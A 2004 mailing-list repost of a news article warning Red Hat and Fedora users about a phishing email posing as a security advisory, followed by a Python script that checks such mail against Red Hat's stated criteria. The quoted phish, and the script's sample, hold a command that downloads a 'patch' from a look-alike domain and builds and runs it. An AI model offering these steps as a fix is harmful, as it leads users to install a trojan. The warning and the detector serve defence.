warning to list

AMAZING POWERS OF OBSERVATION m_epling at comcast.net
Mon Oct 25 02:43:40 UTC 2004


New Phishing Expedition Targets Red Hat/Fedora Users
Oct 25, 2004, 02:30 UTC
http://linuxtoday.com/security/2004102500826SCRHSW
By Brian Proffitt
Managing Editor

It's not often that someone tries launching a trojan attack on Linux
users, but earlier this weekend it appears that someone was trying to do
just that to Red Hat and Fedora Core users.

An e-mail message was sent to several Red Hat users over the weekend,
claiming to be from the RedHat [sic] Security Team. The note warned
recipients to download and install a patch for fileutils-1.0.6,
indicating that a vulnerability "could allow a remote attacker to
execute arbitrary code with root privileges." 

The note was seen in the wild earlier this weekend, but it is still
being delivered. This reporter received the message as late as 6:55 PM
EDT today. The message arrived five times, and all were delivered to my
work account, which is not the account I use to register products.

The content of the note, complete with Red Hat logo, tries to tell a
good tale, as seen below, but the spelling errors and the improper From
address are clues of the note's false nature.

        "Original issue date: October 20, 2004
        
        "Last revised: October 20, 2004
        
        "Source: RedHat 
        
        "A complete revision history is at the end of this file. 
        
        "Dear RedHat user,
        
        "Redhat found a vulnerability in fileutils (ls and mkdir), that
        could allow a remote attacker to execute arbitrary code with
        root privileges. Some of the affected linux distributions
        include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora
        CORE 1, Fedora CORE 2 and not only. It is known that *BSD and
        Solaris platforms are NOT affected.
        
        "The RedHat Security Team strongly advises you to immediately
        apply the fileutils-1.0.6 patch. This is a critical-critical
        update that you must make by following these steps:
        
        
      * "First download the patch from the Security RedHat mirror: wget
        www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
      * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
      * cd fileutils-1.0.6.patch
      * make
      * ./inst
        
        "Again, please apply this patch as soon as possible or you risk
        your system and others` to be compromised.
        
        "Thank you for your prompt attention to this serious matter,
        
        RedHat Security Team..."
        

The domain fedora-redhat.com is part of a netblock owned by Yahoo,
according to Netcraft.com. It is not an official Red Hat site.

The security team at Red Hat has already noted the existence of the fake
warning, and has posted this message, dated October 23, at
http://www.redhat.com/security/:

        "Red Hat has been made aware that emails are circulating that
        pretend to come from the Red Hat Security Team. These emails
        tell users to download and run an update from a users home
        directory. This fake update appears to contain malicious code.
        Official messages from the Red Hat security team are never sent
        unsolicited, are always sent from the address
        secalert at redhat.com, and are digitally signed by GPG. All
        official updates for Red Hat products are digitally signed and
        should not be installed unless they are correctly signed and the
        signature is verified..."
        

Red Hat and Fedora Core users are urged not to download or install the
software highlighted in this fictitious message.
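
The criteria in Red Hat's statement (sender secalert at redhat.com, GPG
signed) and the look-alike download host can be checked mechanically before
anyone follows such a note. The triage below is an added example, not code
from Red Hat or Linux Today; the function names, the sample From address and
the rule that official links stay under redhat.com are assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

OFFICIAL_SENDER = "secalert@redhat.com"  # sender named in Red Hat's statement
OFFICIAL_DOMAIN = "redhat.com"           # assumption: official links stay under this domain
URL_RE = re.compile(r"(?:https?://|www\.)[^\s\"'<>]+", re.I)

def host_of(url):
    """Return the lower-cased host part of a URL, with or without a scheme."""
    rest = re.sub(r"^https?://", "", url, flags=re.I)
    return rest.split("/", 1)[0].split(":", 1)[0].lower()

def is_official_host(host):
    # Exact match or true subdomain only; a bare endswith("redhat.com")
    # would wrongly accept look-alikes such as www.fedora-redhat.com.
    return host == OFFICIAL_DOMAIN or host.endswith("." + OFFICIAL_DOMAIN)

def triage(raw_message):
    """List the ways a single-part, plain-text mail fails Red Hat's criteria."""
    msg = message_from_string(raw_message)
    body = msg.get_payload()
    findings = []
    sender = parseaddr(msg.get("From", ""))[1].lower()
    if sender != OFFICIAL_SENDER:  # From is spoofable: a match proves nothing
        findings.append("from-not-secalert: " + (sender or "<missing>"))
    # Armor presence only; a passing mail still needs `gpg --verify`
    # against Red Hat's published key before it is trusted.
    signed = all(m in body for m in ("-----BEGIN PGP SIGNED MESSAGE-----",
                                     "-----BEGIN PGP SIGNATURE-----"))
    if not signed:
        findings.append("not-pgp-signed")
    for url in URL_RE.findall(body):
        host = host_of(url)
        if not is_official_host(host):
            findings.append("unofficial-host: " + host)
    return findings

# Constructed sample modelled on the note quoted above; the From address is invented.
SAMPLE_PHISH = """From: RedHat Security Team <security@example.invalid>
Subject: fileutils update (constructed subject)

First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_PHISH):
        print(finding)
```

An empty result only means the note is worth verifying with gpg; it is not
proof that the note is genuine.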




